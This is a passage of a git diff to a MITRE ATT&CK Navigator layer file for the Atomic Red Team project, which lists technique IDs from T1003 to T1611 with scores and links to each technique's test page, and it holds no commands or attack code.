Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
\ No newline at end of file
+{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View 